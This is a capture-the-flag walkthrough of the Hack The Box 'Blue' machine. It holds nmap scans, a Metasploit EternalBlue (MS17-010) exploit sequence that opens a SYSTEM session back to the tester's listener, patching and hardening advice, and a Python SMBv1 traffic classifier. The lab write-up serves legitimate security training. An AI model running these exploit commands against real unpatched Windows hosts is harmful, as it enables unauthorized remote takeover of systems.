# HTB: Blue — Walkthrough Notes
**Platform:** Hack The Box | **OS:** Windows | **Difficulty:** Easy  
**Target IP:** 10.10.10.40 | **Date:** 2026-02-24

---

## Scope

Authorized lab environment — HTB retired machine. No real-world systems targeted.

---

## Enumeration

```bash
nmap -sV -sC -p- --open -T4 10.10.10.40
```

Key open ports:
- 135/tcp — MSRPC
- 139/tcp — NetBIOS
- 445/tcp — SMB (Microsoft Windows 7 / Server 2008 R2)

```bash
nmap -p 445 --script smb-vuln-ms17-010 10.10.10.40
```

Result: `VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 (MS17-010)`

---

## Exploitation

Using Metasploit:

```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST <tun0>
run
```

Session opened as `NT AUTHORITY\SYSTEM`.

---

## Flags

- User flag: `C:\Users\haris\Desktop\user.txt`
- Root flag: `C:\Users\Administrator\Desktop\root.txt`

---

## Reinforcement Notes

1. **Disable SMBv1** — no legitimate modern workload requires it.
2. **Apply MS17-010 patch** — KB4012212 (Win7) / KB4012215 (Server 2008 R2).
3. **Network segmentation** — restrict SMB (445) at perimeter.
4. **EDR/logging** — instrument SMB traffic for anomaly detection.
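
To support items 1 and 4, the following added example (not part of the original notes) classifies TCP/445 payloads so that remaining SMBv1 use can be found before and after SMBv1 is disabled. The function names, verdict labels and sample frames are constructed for illustration; it assumes each payload starts at a NetBIOS session header, as delivered by a sensor or capture.

```python
import struct

SMB1_MAGIC, SMB2_MAGIC = b"\xffSMB", b"\xfeSMB"
SMB1_HEADER_LEN = 32        # fixed SMB1 header size
SMB_COM_NEGOTIATE = 0x72
SMB_FLAGS_REPLY = 0x80      # bit in Flags (header offset 9) set on server replies

def parse_dialects(msg: bytes) -> list:
    """Dialect names from an SMB1 negotiate request ([] if truncated)."""
    pos = SMB1_HEADER_LEN + 1 + 2 * msg[SMB1_HEADER_LEN]   # skip WordCount + words
    if pos + 2 > len(msg):
        return []
    (byte_count,) = struct.unpack_from("<H", msg, pos)
    data = msg[pos + 2:pos + 2 + byte_count]
    # Each entry is 0x02, an ASCII dialect name, then a NUL terminator.
    return [d[1:].decode("ascii", "replace")
            for d in data.split(b"\x00") if d[:1] == b"\x02"]

def classify(payload: bytes) -> dict:
    """Classify one TCP/445 payload (NetBIOS session header + SMB message)."""
    if len(payload) < 8 or payload[0] != 0x00:
        return {"verdict": "ignore", "dialects": []}
    length = int.from_bytes(payload[1:4], "big")   # 3-byte big-endian length
    msg = payload[4:4 + length]
    if msg[:4] == SMB2_MAGIC:
        return {"verdict": "smb2+", "dialects": []}
    if msg[:4] != SMB1_MAGIC or len(msg) <= SMB1_HEADER_LEN:
        return {"verdict": "ignore", "dialects": []}
    if msg[4] == SMB_COM_NEGOTIATE and not msg[9] & SMB_FLAGS_REPLY:
        dialects = parse_dialects(msg)
        # Modern clients open with an SMB1-framed negotiate that also lists
        # SMB 2.x dialects; no SMB 2.x entry means the client speaks SMBv1 only.
        if any(d.startswith("SMB 2") for d in dialects):
            return {"verdict": "multi-protocol-negotiate", "dialects": dialects}
        return {"verdict": "smb1-only-client", "dialects": dialects}
    return {"verdict": "smb1-in-use", "dialects": []}   # SMBv1 is being spoken

def smb1(command: int, dialects=(), flags=0x18) -> bytes:
    """Constructed-sample helper: framed minimal SMB1 message with a dialect list."""
    data = b"".join(b"\x02" + d.encode() + b"\x00" for d in dialects)
    header = SMB1_MAGIC + bytes([command]) + bytes(4) + bytes([flags]) + bytes(22)
    msg = header + b"\x00" + struct.pack("<H", len(data)) + data
    return b"\x00" + len(msg).to_bytes(3, "big") + msg

if __name__ == "__main__":
    samples = (smb1(0x72, ["NT LM 0.12"]), smb1(0x72, ["NT LM 0.12", "SMB 2.002"]), smb1(0x73))
    for pkt in samples:   # constructed frames, not captured traffic
        print(classify(pkt))
```

Hosts that produce `smb1-only-client` or `smb1-in-use` verdicts are the ones to remediate or isolate first; `multi-protocol-negotiate` alone is normal for current Windows clients.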

---

*Writeup sanitized for public archive. Exact payload details kept in private authorized engagement notes.*
